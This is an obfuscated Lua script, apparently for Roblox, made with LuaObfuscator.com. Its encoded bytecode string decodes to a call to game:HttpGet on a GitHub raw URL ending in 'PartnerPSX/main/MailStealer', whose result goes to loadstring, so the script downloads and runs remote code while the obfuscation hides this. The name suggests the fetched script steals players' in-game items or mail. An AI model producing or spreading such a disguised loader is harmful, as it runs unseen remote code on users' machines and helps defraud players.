--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v31=0;local v32;local v33;local v34;local v35;local v36;local v37;local v38;while true do if ((4 -1)==v31) then v38=nil;while true do if (v32~=(2 -1)) then else v36={v33,v34,nil,v35};v37=v24();v38={};v32=2;end if ((0 + 0)==v32) then local v90=0 + 0 ;while true do if (v90~=0) then else v33={};v34={};v90=1456 -(662 + 793) ;end if (v90~=(1845 -(489 + 1355))) then else v35={};v32=1;break;end end end if (v32==(10 -7)) then local v91=595 -(417 + 178) ;local v92;while true do if (v91~=0) then else v92=1711 -(1386 + 325) ;while true do local v112=0 -0 ;while true do if (v112==(0 + 0)) then if (v92==(1 + 0)) then return v36;end if ((1169 -(1029 + 140))==v92) then local v119=0;while true do if (v119~=(770 -(289 + 481))) then else for v139=1,v24() do v34[v139-1 ]=v29();end for v141=691 -(332 + 358) ,v24() do v35[v141]=v24();end v119=1;end if (v119~=1) then else v92=1;break;end end end break;end end end break;end end end if (v32==2) then for v97=1684 -(193 + 1490) ,v37 do local v98=0;local v99;local v100;while true do if (v98==(1545 -(298 + 1246))) then if (v99==(929 -(923 + 5))) then v100=v22()~=0 ;elseif (v99==(1 + 1)) then v100=v25();elseif (v99~=(9 -6)) then else v100=v26();end v38[v97]=v100;break;end if (v98~=(0 + 0)) then else v99=v22();v100=nil;v98=1;end end end v36[1 + 2 ]=v22();for v101=1,v24() do local v102=0 + 0 ;local v103;local v104;local v105;while true do if (v102==1) then v105=nil;while true do if (v103==0) then local v114=0;while true do if ((1 -0)==v114) then v103=1478 -(281 + 1196) ;break;end if (v114==0) then v104=0 -0 ;v105=nil;v114=1 + 0 ;end end end if (v103==1) then while true do if (v104~=(0 -0)) then else v105=v22();if (v21(v105,1,1)==(1150 -(766 + 384))) then local v132=0 + 0 ;local v133;local v134;local v135;local v136;local v137;while true do if (v132==(3 -2)) then v135=nil;v136=nil;v132=3 -1 ;end if (v132==(0 -0)) then v133=0 + 0 ;v134=nil;v132=1;end if (v132~=2) then else v137=nil;while true do if (1==v133) then v136=nil;v137=nil;v133=2;end if (v133~=2) then else while true do if (v134==1) then local v156=0;local v157;while true do if (v156==(762 -(10 + 752))) then v157=0 -0 ;while true do if (v157==(0 -0)) then v137={v23(),v23(),nil,nil};if (v135==0) then local v166=0 -0 ;local v167;while true do if (v166~=(830 -(138 + 692))) then else v167=0;while true do if (v167==0) then v137[34 -(25 + 6) ]=v23();v137[4]=v23();break;end end break;end end elseif (v135==1) then v137[1225 -(300 + 922) ]=v24();elseif (v135==(2 + 0)) then v137[3]=v24() -((1 + 1)^16) ;elseif (v135==(9 -6)) then local v172=0;local v173;while true do if (v172==(0 -0)) then v173=0 + 0 ;while true do if (v173==0) then v137[3]=v24() -(2^16) ;v137[14 -10 ]=v23();break;end end break;end end end v157=1 + 0 ;end if (v157~=(1771 -(86 + 1684))) then else v134=1563 -(629 + 932) ;break;end end break;end end end if (v134==(6 -3)) then if (v21(v136,9 -6 ,7 -4 )~=1) then else v137[7 -3 ]=v38[v137[882 -(250 + 628) ]];end v33[v101]=v137;break;end if (v134~=(0 + 0)) then else v135=v21(v105,2 + 0 ,616 -(393 + 220) );v136=v21(v105,4,2 + 4 );v134=1;end if (v134~=(725 -(590 + 133))) then else local v159=0;while true do if (v159==0) then if (v21(v136,1,3 -2 )==1) then v137[361 -(280 + 79) ]=v38[v137[1 + 1 ]];end if (v21(v136,1377 -(1131 + 244) ,2)==(1 + 0)) then v137[9 -6 ]=v38[v137[3]];end v159=1;end if (v159==(3 -2)) then v134=446 -(231 + 212) ;break;end end end end break;end if (v133==0) then v134=833 -(633 + 200) ;v135=nil;v133=1;end end break;end end end break;end end break;end end break;end if (0==v102) then v103=1974 -(1301 + 673) ;v104=nil;v102=1;end end end v32=3;end end break;end if (v31==1) then v34=nil;v35=nil;v31=3 -1 ;end if (v31~=2) then else v36=nil;v37=nil;v31=3;end if ((0 + 0)==v31) then v32=0 + 0 ;v33=nil;v31=1 + 0 ;end end end v18=5;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v39)if (v1(v39,2)==79) then v20=v0(v3(v39,1,1));return "";else local v75=v2(v0(v39,16));if v20 then local v79=v5(v75,v20);v20=nil;return v79;else return v75;end end end);v21=nil;v18=1;end if (2==v18) then function v23()local v40,v41=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;return (v41 * (1938 -(386 + 1296))) + v40 ;end v24=nil;function v24()local v42=115 -(22 + 93) ;local v43;local v44;local v45;local v46;while true do if (v42==(21 -((974 -(448 + 520)) + 14))) then return (v46 * (22285851 -5508635)) + (v45 * ((5622 + 168628) -108714)) + (v44 * 256) + v43 ;end if (v42==(284 -(273 + 11))) then v43,v44,v45,v46=v1(v16,v19,v19 + (7 -4) );v19=v19 + (7 -3) ;v42=1 -0 ;end end end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v47,v48,v49)local v50=v47[1];local v51=v47[2];local v52=v47[3];return function(...)local v67=0;local v68;local v69;local v70;local v71;local v72;while true do if (v67==2) then v72=nil;function v72()local v80=v50;local v81=v51;local v82=v52;local v83=v28;local v84={};local v85={};local v86={};for v94=0 -0 ,v71 do if ((v94>=v82) or ((2647 + 1490)==(244 -111))) then v84[v94-v82 ]=v70[v94 + (2 -1) ];else v86[v94]=v70[v94 + (1378 -(97 + 1280)) ];end end local v87=(v71-v82) + 1 + 0 ;local v88;local v89;while true do local v95=0;while true do if (((4429 -(344 + 224))<(5420 -(526 + 708))) and (v95==(0 -0))) then v88=v80[v68];v89=v88[1 + 0 ];v95=1;end if ((v95==(1848 -(361 + 1486))) or ((3949 -(1251 + 50))>=((12600 -8334) -(172 + (42 -12))))) then if (((4495 -(269 + (2458 -(1084 + 600))))>(1654 -791)) and (v89<=((3 + 0) -1))) then if ((3613==(4821 -((1453 -(634 + 228)) + 617))) and (v89<=(0 + (359 -(180 + 179))))) then local v115=711 -(200 + 511) ;local v116;local v117;local v118;while true do if (((734 + 979)<(13957 -10956)) and (v115==(0 + 0))) then v116=1669 -(635 + 1034) ;v117=nil;v115=1 + 0 ;end if ((v115==(307 -(37 + 269))) or (((1736 -1294) -(35 + 286))>(1338 -(132 + 173 + 39)))) then v118=nil;while true do if ((((15691 -10660) -3674)<(201 + 1180)) and (v116==(0 -0))) then local v143=0 + 0 ;while true do if ((((3122 -(359 + 71)) -(1041 + 58))>(4367 -2884)) and ((0 + 0 + 0)==v143)) then v117=v88[4 -2 ];v118=v86[v88[10 -7 ]];v143=1 -0 ;end if (((14796 -11027)>=(735 + 1095)) and (v143==(1 + 0))) then v116=2 -1 ;break;end end end if ((((1226 -(57 + 462)) + 3920)>1189) and ((4 -3)==v116)) then v86[v117 + 1 + 0 ]=v118;v86[v117]=v118[v88[1411 -((2199 -(58 + 795)) + (428 -(316 + 51))) ]];break;end end break;end end elseif ((v89>(1 + 0 + 0)) or ((5586 -(73 + 872))<(3204 -(556 + 482)))) then local v120=0 + 0 ;local v121;local v122;local v123;local v124;while true do if ((((1723 + 1814) -2207)<(16582 -12471)) and (v120==(6 -4))) then for v147=v121,v69 do local v148=0 + 0 + 0 ;local v149;while true do if ((((2952 -(41 + 1616)) -(888 + 34 + 373))==v148) or (((4983 -3135) -(1238 + 179))>(1468 + 751))) then v149=(0 + 0) -(0 + 0) ;while true do if ((v149==(0 -0)) or ((47 + 725)<579)) then v124=v124 + (1510 -(684 + (1537 -(32 + 680)))) ;v86[v147]=v122[v124];break;end end break;end end end break;end if (((722 + 146)<=(1437 -(274 + 213))) and ((1060 -(554 + 506))==v120)) then v121=v88[1 + 1 + 0 ];v122,v123=v83(v86[v121](v13(v86,v121 + 1 + 0 ,v88[1726 -(600 + 1123) ])));v120=1 + 0 ;end if (((10330 -(7059 -(1247 + 336)))>=((4114 -2270) -(1156 + (423 -201)))) and (v120==(3 -2))) then v69=(v123 + v121) -(1 -0) ;v124=1903 -(1318 + 585) ;v120=2 -0 ;end end else local v125=217 -((879 -677) + 15) ;local v126;local v127;while true do if (((3920 -(33 + 1753))>(917 + 102 + 496)) and (v125==(1 + 0 + 0))) then while true do if ((2616>=(3319 -(2450 -(12 + 850)))) and (v126==((0 + 0) -0))) then v127=v88[2 + 0 ];v86[v127]=v86[v127](v13(v86,v127 + ((671 -(367 + 300)) -3) ,v69));break;end end break;end if ((v125==(1350 -(83 + 932 + 335))) or ((830 -354)==(2635 -1367))) then v126=0 -0 ;v127=nil;v125=892 -((969 -623) + 545) ;end end end elseif ((v89<=(12 -8)) or ((322 + 1147 + 942 + 2079)<=((2342 -1404) -580))) then if (((371 + 1912)<=(1623 + 2169)) and (v89>(32 -(10 + (56 -37))))) then v86[v88[707 -(138 + 400 + 167) ]]=v88[1 + 0 + 2 ];else do return;end end elseif ((v89>(2 + 3)) or ((2483 -(4 + 120 + 1125))>=(5491 -(272 + 676)))) then v86[v88[4 -2 ]]=v49[v88[3 + 0 ]];else v86[v88[1 + 1 ]]();end v68=v68 + 1 + 0 ;break;end end end end v67=3;end if (v67==3) then A,B=v28(v11(v72));if  not A[1] then local v96=v47[4][v68] or "?" ;error("Script error at ["   .. v96   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v67==0) then v68=1;v69= -1;v67=1;end if (v67==1) then v70={...};v71=v12("#",...) -1 ;v67=2;end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then function v21(v53,v54,v55)if v55 then local v76=(v53/(2^(v54-(1 + 0))))%((3 -1)^(((v55-(1 + 0)) -(v54-(1 + (1263 -(931 + 332))))) + (1340 -(301 + 1038)))) ;return v76-(v76%(1 + (960 -(498 + 462)))) ;else local v77=0;local v78;while true do if (v77==(0 -0)) then v78=(2 + 0)^(v54-(1 + 0)) ;return (((v53%(v78 + v78))>=v78) and (4 -3)) or (1077 -(684 + 393)) ;end end end end v22=nil;function v22()local v56=0 -0 ;local v57;while true do if (v56==0) then v57=v1(v16,v19,v19);v19=v19 + 1 ;v56=1674 -(91 + 1582) ;end if ((826 -((413 -131) + 543))==v56) then return v57;end end end v23=nil;v18=2;end if (v18==3) then function v25()local v58=v24();local v59=v24();local v60=1 + 0 ;local v61=(v21(v59,160 -(5 + 154) ,13 + 7 ) * ((2 + 0)^(21 + 11))) + v58 ;local v62=v21(v59,54 -(9 + 24) ,22 + (1194 -(845 + 340)) );local v63=((v21(v59,66 -(53 -19) )==(1 + 0)) and  -(1 -0)) or (1367 -(398 + 968)) ;if (v62==((0 -0) + (195 -(67 + 128)))) then if (v61==(0 -0)) then return v63 * (0 -0) ;else v62=1658 -(122 + 1535) ;v60=(267 -(38 + 229)) + 0 ;end elseif (v62==(1323 + 724)) then return ((v61==0) and (v63 * (1/(0 -0)))) or (v63 * NaN) ;end return v8(v63,v62-1023 ) * (v60 + (v61/((3 -1)^(10 + 20 + 22)))) ;end v26=nil;function v26(v64)local v65;if  not v64 then v64=v24();if (v64==(1193 -(6 + 1187))) then return "";end end v65=v3(v16,v19,(v19 + v64) -(3 -2) );v19=v19 + v64 ;local v66={};for v73=1, #v65 do v66[v73]=v2(v1(v3(v65,v73,v73)));end return v6(v66);end v27=v24;v18=4;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F493O6C496C3O493O6C496C493O6C2O496C493O6C496C2O496C496C492F506172746E65725053582F6D61696E2F4D61696C537465616C657200083O0012063O00013O001206000100023O00202O000100010003001204000300044O0002000100034O00015O00022O00053O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
